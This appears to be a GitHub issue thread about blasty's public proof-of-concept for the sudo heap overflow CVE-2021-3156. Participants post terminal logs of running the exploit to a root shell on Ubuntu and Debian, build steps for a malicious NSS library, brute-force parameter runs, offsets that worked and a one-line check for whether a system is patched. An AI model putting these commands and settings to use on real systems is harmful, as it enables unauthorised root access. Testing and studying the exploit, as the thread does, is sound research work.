Not working on my focal

[LyesH4ck]

Hello,

Tested on my fresh install of focal.

user@ubuntu20:~/TEST/CVE-2021-3156$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

user@ubuntu20:/TEST/CVE-2021-3156$ uname -a
Linux ubuntu20 5.8.0-41-generic #4620.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu20:/TEST/CVE-2021-3156$ ls
hax.c lib.c libnss_X Makefile README.md sudo-hax-me-a-sandwich
user@ubuntu20:/TEST/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
free(): invalid pointer
Aborted (core dumped)

user@ubuntu20:~/TEST/CVE-2021-3156$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l

user@ubuntu20:~/TEST/CVE-2021-3156$ /usr/bin/sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

I've tested your fuzz2.py but I'not able to crash in process_hooks_getenv() or in nss_load_library()...
Only found Interesting crash in set_cmnd()...

[blasty]

Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.

[transparentdata243]

same issue here. environment is same as above. Used a test user which is not in sudoers list.

[LyesH4ck]

Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.

test@ubuntu20:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

Ok it works ;)

When I use your fuzz2.py.. I can't find a good crash in nss_load_library() or in process_hook_getenv().
Is that normal ?
Maybe something I don't understand. I found crash in set_cmnd()... Only interesting way I found ..

Any hint ?

Thanks you !

[blasty]

@lyes06 Good to see you could get it working with a different user! fuzz2.py must be run as a user who has sudo rights (if you look in the script you can see it invokes sudo env -i ...). You have to be lucky to get some "nice" crashes with this fuzzer. I might rewrite that thing eventually, it can be made better(tm).

[PixiesPixel]

It also doesn't work on my ubuntu 20.04

`$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty [email protected]

usage: ./sudo-hax-me-a-sandwich

available targets:

0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

---

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
$ id -a
uid=1001(test) gid=1001(test) groups=1001(test)
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.1 LTS
Release: 20.04
Codename: focal
`

[LyesH4ck]

It also doesn't work on my ubuntu 20.04

`$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty [email protected]

usage: ./sudo-hax-me-a-sandwich

available targets:

0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
$ id -a
uid=1001(test) gid=1001(test) groups=1001(test)
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.1 LTS
Release: 20.04
Codename: focal
`

You get the Usage .. So I think your ubuntu is patched..

Try this : sudoedit -s '' perl -e 'print "A" x 65536'

If you get usage information... so you are patched.

[PixiesPixel]

I haven't patch it soon, but you may right.

sudoedit -s '' perl -e 'print "A" x 65536' usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..

[LyesH4ck]

I haven't patch it soon, but you may right.

sudoedit -s '' perl -e 'print "A" x 65536' usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..

I confirm, you are patched :)
Try to reinstall old sudo packages if you want to play with it ;)

[LyesH4ck]

I deleted my last post to explain again the problem.

- Compilation with Make - No -DBRUTE option

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
'#'

- When I use the options used in brute.sh

$ make brute
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
[sudo] password for test:

And when we are using just the printf() in lib.c, brute.sh freez and it stoped
But I don't know why ...

[LyesH4ck]

- When the sploit works

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
#

• When I use the same buf value with brute.sh

$ ./brute.sh 50 60 50 70 200 220
[+] cleaning up..
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
[+] generating possibilities..
[+] lets go..

Computers / CPU cores / Max jobs to run
1:local / 2 / 4

Computer:jobs running/jobs completed/%of started jobs/Average seconds to complete
ETA: 0s Left: 693 AVG: 0.00s local:4/0/100%/0.0s NOPE
./brute.sh: line 13: 292375 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 692 AVG: 0.00s local:4/1/100%/1.0s NOPE
./brute.sh: line 13: 292361 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 691 AVG: 0.00s local:4/2/100%/0.5s NOPE
./brute.sh: line 13: 292368 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 690 AVG: 0.00s local:4/3/100%/0.3s NOPE
./brute.sh: line 13: 292369 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 689 AVG: 0.00s local:4/4/100%/0.2s NOPE
.......
.......
ETA: 0s Left: 4 AVG: 0.12s local:4/689/100%/0.1s NOPE
./brute.sh: line 13: 309687 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 3 AVG: 0.12s local:3/690/100%/0.1s NOPE
./brute.sh: line 13: 309721 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 2 AVG: 0.12s local:2/691/100%/0.1s NOPE
./brute.sh: line 13: 309737 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 1 AVG: 0.12s local:1/692/100%/0.1s NOPE
./brute.sh: line 13: 309762 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 0 AVG: 0.12s local:0/693/100%/0.1s
[+] done
[-] we didnt find any working candidates :(

[LyesH4ck]

I modified your script brute.sh and delete /2 used in the script.
Now it works.. but I freez .. (ETA : 7287s).
I need to C^ to finish the execution .. I don't know why the script is freezing ...

ETA: 56s Left: 454 AVG: 0.13s local:4/239/100%/0.1s NOPE
./brute.sh: line 13: 354756 Segmentation fault ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 7287s Left: 450 AVG: 16.20s local:4/243/100%/16.2s ^C
[sudo] password for test:
[sudo] password for test:
[sudo] password for test:
[sudo] password for test:
[+] done
[+] we found some goodies (saved in success.txt):

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 200)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 210)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 220)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 200)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 210)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 220)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

[sha0coder]

Same vagrant ubuntu/focal64 same libc + sudo version (manually compiled) and don't work, even don't seem exploitable:
The "@ccccc" buffers are far from the "systemd" and other service_user structures (0x1000 the more near) .
The user_args malloc fit well in the previous free but it's still very far. I have friends that it happens the same situation.
Using no sudoers users also don't work for me.
probably the exploitation depends on other factors: ram? locales? etc.
Blasty, make it sense?

[jm33-m0]

Same vagrant ubuntu/focal64 same libc + sudo version (manually compiled) and don't work, even don't seem exploitable:
The "@ccccc" buffers are far from the "systemd" and other service_user structures (0x1000 the more near) .
The user_args malloc fit well in the previous free but it's still very far. I have friends that it happens the same situation.
Using no sudoers users also don't work for me.
probably the exploitation depends on other factors: ram? locales? etc.
Blasty, make it sense?

Same here, no luck with manually compiled sudo